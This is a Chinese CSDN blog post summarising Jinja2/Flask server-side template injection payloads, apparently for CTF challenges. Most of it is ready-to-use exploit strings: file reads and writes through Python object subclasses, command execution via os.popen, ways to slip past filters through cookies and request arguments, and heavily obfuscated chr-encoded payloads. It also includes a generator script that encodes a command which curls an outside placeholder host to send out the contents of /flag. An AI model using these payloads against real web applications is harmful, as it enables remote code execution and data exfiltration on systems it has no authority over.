SSTI 命令执行的一些总结

最新推荐文章于 2024-05-10 01:51:09 发布
最新推荐文章于 2024-05-10 01:51:09 发布
阅读量1.1k 收藏 8
点赞数 1
分类专栏: SSTI
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/chizhaji/article/details/113834092
版权

SSTI 命令执行的一些总结

关于SSTI百度上面有很多解释的,我就不用去copy了,主要就是那几个函数的使用

//获取基本类
''.__class__.__mro__[1]
{}.__class__.__bases__[0]
().__class__.__bases__[0]
[].__class__.__bases__[0]
object

//读文件
().__class__.__bases__[0].__subclasses__()[40](r'C:\1.php').read()
object.__subclasses__()[40](r'C:\1.php').read()

//写文件
().__class__.__bases__[0].__subclasses__()[40]('/var/www/html/input', 'w').write('123')
object.__subclasses__()[40]('/var/www/html/input', 'w').write('123')

//执行任意命令
().__class__.__bases__[0].__subclasses__()[59].__init__.func_globals.values()[13]['eval']('__import__("os").popen("ls  /var/www/html").read()' )
object.__subclasses__()[59].__init__.func_globals.values()[13]['eval']('__import__("os").popen("ls  /var/www/html").read()' )

我就总结一下payload的形式

1.name={{().__class__.__mro__[-1].__subclasses__()[132].__init__.__globals__['popen']('cat /flag').read()}}

2.?name={{x.__init__.__globals__['__builtins__'].eval('__import__("os").popen("cat /flag").read()')}}

这两个都能执行cat /flag

又可以拓展为

?name={{x.__init__.__globals__[request.args.x1].eval(request.args.x2)}}&x1=__builtins__&x2=__import__('os').popen('cat /flag').read()

如果get被过滤了__builtins____import__('os').popen('cat /flag').read()之类的还可以把他们放在cookie里 用cooikies里面传值

?name={{x.__init__.__globals__.__getitem__(request.cookies.x1).eval(request.cookies.x2)}}

Cookie:x1=__builtins__;x2=__import__('os').popen('cat /flag').read()

如果过滤了.__init__.__globals__.__getitem__这些也可以一起弄成变量传cookie

比如

?name={{(x|attr(request.cookies.x1)|attr(request.cookies.x2)|attr(request.cookies.x3))(request.cookies.x4).eval(request.cookies.x5)}}

Cookie:x1=__init__;x2=__globals__;x3=__getitem__;x4=__builtins__;x5=__import__('os').popen('cat /flag').read()

终极代码

?name= {% set po=dict(po=a,p=a)|join%} {% set a=(()|select|string|list)|attr(po)(24)%} {% set ini=(a,a,dict(init=a)|join,a,a)|join()%} {% set glo=(a,a,dict(globals=a)|join,a,a)|join()%} {% set geti=(a,a,dict(getitem=a)|join,a,a)|join()%} {% set built=(a,a,dict(builtins=a)|join,a,a)|join()%} {% set x=(q|attr(ini)|attr(glo)|attr(geti))(built)%} {% set chr=x.chr%} {% set file=chr(47)%2bchr(102)%2bchr(108)%2bchr(97)%2bchr(103)%} {%print(x.open(file).read())%}

?name= {% set c=(dict(e=a)|join|count)%} {% set cc=(dict(ee=a)|join|count)%} {% set ccc=(dict(eee=a)|join|count)%} {% set cccc=(dict(eeee=a)|join|count)%} {% set ccccccc=(dict(eeeeeee=a)|join|count)%} {% set cccccccc=(dict(eeeeeeee=a)|join|count)%} {% set ccccccccc=(dict(eeeeeeeee=a)|join|count)%} {% set cccccccccc=(dict(eeeeeeeeee=a)|join|count)%} {% set coun=(cc~cccc)|int%} {% set po=dict(po=a,p=a)|join%} {% set a=(()|select|string|list)|attr(po)(coun)%} {% set ini=(a,a,dict(init=a)|join,a,a)|join()%} {% set glo=(a,a,dict(globals=a)|join,a,a)|join()%} {% set geti=(a,a,dict(getitem=a)|join,a,a)|join()%} {% set built=(a,a,dict(builtins=a)|join,a,a)|join()%} {% set x=(q|attr(ini)|attr(glo)|attr(geti))(built)%} {% set chr=x.chr%} {% set file=chr((cccc~ccccccc)|int)%2bchr((cccccccccc~cc)|int)%2bchr((cccccccccc~cccccccc)|int)%2bchr((ccccccccc~ccccccc)|int)%2bchr((cccccccccc~ccc)|int)%} {%print(x.open(file).read())%}

如果过滤了print

?name= {% set c=(t|count)%} {% set cc=(dict(e=a)|join|count)%} {% set ccc=(dict(ee=a)|join|count)%} {% set cccc=(dict(eee=a)|join|count)%} {% set ccccc=(dict(eeee=a)|join|count)%} {% set cccccc=(dict(eeeee=a)|join|count)%} {% set ccccccc=(dict(eeeeee=a)|join|count)%} {% set cccccccc=(dict(eeeeeee=a)|join|count)%} {% set ccccccccc=(dict(eeeeeeee=a)|join|count)%} {% set cccccccccc=(dict(eeeeeeeee=a)|join|count)%} {% set ccccccccccc=(dict(eeeeeeeeee=a)|join|count)%} {% set cccccccccccc=(dict(eeeeeeeeeee=a)|join|count)%} {% set coun=(ccc~ccccc)|int%} {% set po=dict(po=a,p=a)|join%} {% set a=(()|select|string|list)|attr(po)(coun)%} {% set ini=(a,a,dict(init=a)|join,a,a)|join()%} {% set glo=(a,a,dict(globals=a)|join,a,a)|join()%} {% set geti=(a,a,dict(getitem=a)|join,a,a)|join()%} {% set built=(a,a,dict(builtins=a)|join,a,a)|join()%} {% set x=(q|attr(ini)|attr(glo)|attr(geti))(built)%} {% set chr=x.chr%} {% set cmd= %} {%if x.eval(cmd)%} abc {%endif%}

cmd由下面代码生成

def aaa(t): t='('+(int(t[:-1:])+1)*'c'+'~'+(int(t[-1])+1)*'c'+')|int' return t s='__import__("os").popen("curl http://xxx:4567?p=cat /flag").read()' def ccchr(s): t='' for i in range(len(s)): if i<len(s)-1: t+='chr('+aaa(str(ord(s[i])))+')%2b' else: t+='chr('+aaa(str(ord(s[i])))+')' return t print(ccchr(s))

不上钻石不改名
关注
  • 1
    点赞
  • 8
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
python ssti正确利用方式
qq_49973474的博客
05-11 550
很好 很有精神
【模板注入】SSTI命令执行payload分析
4ut15m's blog
02-09 3713
SSTI基础 网上有关SSTI基础的文章很多,写的好的文章也有.下面给出一篇文章,本文不再细讲基础. <<从零学习flask模板注入>>@和蔼的杨小二 命令执行 要想执行命令便需要有可以执行命令的模块,一般来说很容易想到的模块便是os. 这里先看一个payload ''.__class__.__mro__[2].__subclasses__()[71].__in...
网络安全最新SSTI模板注入详细总结及WAF绕过_fenjing ssti(1),网络安全最新面试题及答案
最新发布
2401_84545016的博客
05-10 629
在结束之际,我想重申的是,学习并非如攀登险峻高峰,而是如滴水穿石般的持久累积。尤其当我们步入工作岗位之后,持之以恒的学习变得愈发不易,如同在茫茫大海中独自划舟,稍有松懈便可能被巨浪吞噬。然而,对于我们程序员而言,学习是生存之本,是我们在激烈市场竞争中立于不败之地的关键。一旦停止学习,我们便如同逆水行舟,不进则退,终将被时代的洪流所淘汰。因此,不断汲取新知识,不仅是对自己的提升,更是对自己的一份珍贵投资。让我们不断磨砺自己,与时代共同进步,书写属于我们的辉煌篇章。需要完整版PDF学习资源私我。
学习笔记-java代码审计-ssti
人饭子的博客
11-13 466
java代码审计-ssti 0x01漏洞挖掘 Velocity @RequestMapping("/ssti/velocity") public String velocity(@RequestParam(name = "content") String content) { Velocity.init(); VelocityContext velocityContext = n...
python SSTI注入
weixin_44843084的博客
06-21 745
https://www.jianshu.com/p/a77c50dfebcb https://xz.aliyun.com/t/3679#toc-9 SSTI(Server-Side Template Injection) 服务端模板注入,就是服务器模板中拼接了恶意用户输入导致各种漏洞。通过模板,Web应用可以把输入转换成特定的HTML文件或者email格式 {{ ... }}:装载一个变量,模板渲染的时候,会使用传进来的同名参数这个变量代表的值替换掉。 {% ... %}:装载一个控制语句。 {# ...
SSTI入门详解
E1even的博客
03-15 5038
关于基于flask的SSTI漏洞的阶段学习小结: SSTI的理解: SSTI和SQL注入原理差不多,都是因为对输入的字符串控制不足,把输入的字符串当成命令执行SSTI引发的真正原因: render_template渲染函数的问题 render_template渲染函数是什么: 就是把HTML涉及的页面与用户数据分离开,这样方便展示和管理。当用户输入自己的数据信息,HTML页面可以根据用户自身的信息来展示页面,因此才有了这个函数的使用。 ...
Flask SSTI/沙箱逃逸的一些总结
01-20
​ 模板注入,与SQL注入、命令注入等原理相似,都是用户的输入数据没有被合理的处理控制时,就有可能数据插入了程序段中成为程序的一部分,从而改变了程序的执行逻辑。 0x01 沙箱逃逸原理 沙盒/沙箱 ​ 沙箱在早期...
fenjing工具,ssti
12-17
SSTI允许攻击者通过注入恶意模板代码来执行服务器端的任意命令,获取敏感信息,或者对应用程序进行破坏。当Web应用程序不恰当地将用户输入的数据与模板引擎结合时,就可能发生SSTI。 在利用SSTI的过程中,Fenjing...
SSTI
03-09
2. **远程代码执行**:某些模板引擎允许执行系统命令,攻击者可以借此实现RCE,对服务器造成严重破坏。 3. **权限提升**:攻击者可能利用SSTI获取更高权限,进一步控制整个服务器网络。 4. **中间人攻击**:SSTI也...
ssti-payload:SSTI有效载荷生成器
02-06
SSTI有效载荷发生器 该生成器是针对特定类型的Java SSTI的,其受以下启发: ${T(org.apache.commons.io.IOUtils).toString(T(java.lang.Runtime).getRuntime().exec(T(java.lang.Character).toString(99)....
flaskssti:测试SSTI
02-21
攻击者可以利用这种漏洞获取服务器上的敏感信息、执行系统命令,甚至完全控制服务器。防范SSTI的关键在于避免在模板中直接使用未经验证的用户输入,以及启用模板沙箱模式,限制模板引擎的执行能力。 在“flaskssti...
SSTI了解+反序列化了解+SSRF了解+之前的一些题
qq_61109509的博客
03-06 723
文章目录SSTI简介web361web362SSTI 命令执行的一些总结 SSTI简介 SSTI,即服务端模板注入,起因是服务端接收了用户的输入,将其作为 Web 应用模板内容的一部分,在进行目标编译渲染的过程中,执行了用户插入的恶意内容,从而导致各种各样的问题,与sql注入类似 web361 名字就是考点 ?name={{x.__init__.__globals__['__builtins__'].eval('__import__("os").popen("cat /flag").read()')}}
SSTI服务器模板注入原理&攻击手法&绕过手法&防御手段
qq_56815564的博客
07-31 921
时间一晃,又是好久没有发过文章了,最近再准备面试了,当你真正去准备的时候你才会发现自己原来什么都还只是个半吊子,哎难顶正好看到一道面试题,说是说一下python有关的漏洞,这边因为对php的漏洞熟悉一点,所以这方面我发现我是真的什么都不知道,于是上网去找了很久,再学习的过程中顺便总结了这篇文章吧🙏。
CTFSHOW-SSTI
Monica的博客
11-12 4825
参考文章 SSTI模板注入绕过(进阶篇)_羽的博客-CSDN博客_ssti绕过
CTFSHOW SSTI
羽的博客
01-08 5897
文章目录web361web362web363web364web365web366、367web368web369web370web371web372 建议大家先看下笔者之前写的模板注入的文章 web361 payload name={{().__class__.__mro__[-1].__subclasses__()[132].__init__.__globals__['popen']('cat /flag').read()}} web362 payload ?name={{x.__init__.__glo
SSTI详解 一文了解SSTI和所有常见payload 以flask模板为例
闵行小鱼塘
10-13 5495
做的ctf题里有好几道跟SSTI有关,故对SSTI进行学习,在此做个小结与记录
Python中的SSTI (一)
qq_43511094的博客
03-21 5367
模板注入什么是Flask什么是SSTI什么是JinJa2什么是模板引擎Jinja2 详细知识基本语法基本用法一般用法for语句的使用if 语句继承filter 语句的使用空白行处理类的详细知识SSTI的payloadpopen()方法python中的SSTI常用的payload 什么是Flask Flask是一个轻量级的python的web框架。轻量级说明他只适用于构建小型网站。 什么是SSTI SSTI,Server-Site Template Injection,即服务器模板注入。同XSS注入,SQL
python模板注入_Python模板注入(SSTI)深入学习
weixin_29055137的博客
02-04 1146
前言一直对模板注入似懂非懂的,打算在这篇文章中深入的研究一下模板注入以及在ctf中bypass的办法。Learning什么是模板&模板注入小学的时候拿别人的好词好句,套在我们自己的作文里,此时我们的作文就相当于模板,而别人的好词好句就相当于传递进模板的内容。那么什么是模板注入呢,当不正确的使用模板引擎进行渲染时,则会造成模板注入,比如:from flask import Flaskfrom...
python __reduce__魔法方法_关于python魔术方法payload:"".__class__.__mro__[2].__subclasses__()[40]("/etc/passwd"...
weixin_39737757的博客
11-28 218
总览"".__class__.__mro__[2].__subclasses__()[40]("/etc/passwd").read()其实就是类似java的反射,通过一个对象找到另一个对象,这里通过一个字符串对象,找了一个文件对象,然后初始化,读取,就是这么个事。# 获得一个字符串实例>>> ""''# 获得字符串的type实例>>> "".__class__# 获得其父类>>> "".__cl...
flask ssti
09-26
攻击者可以通过向模板注入恶意代码来执行任意命令或获取敏感信息。要防止SSTI漏洞,开发者需要注意对用户输入进行适当的过滤和转义。 在上面提供的代码中,虽然简单,但存在SSTI漏洞的潜在风险。因为在模板中,我们...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值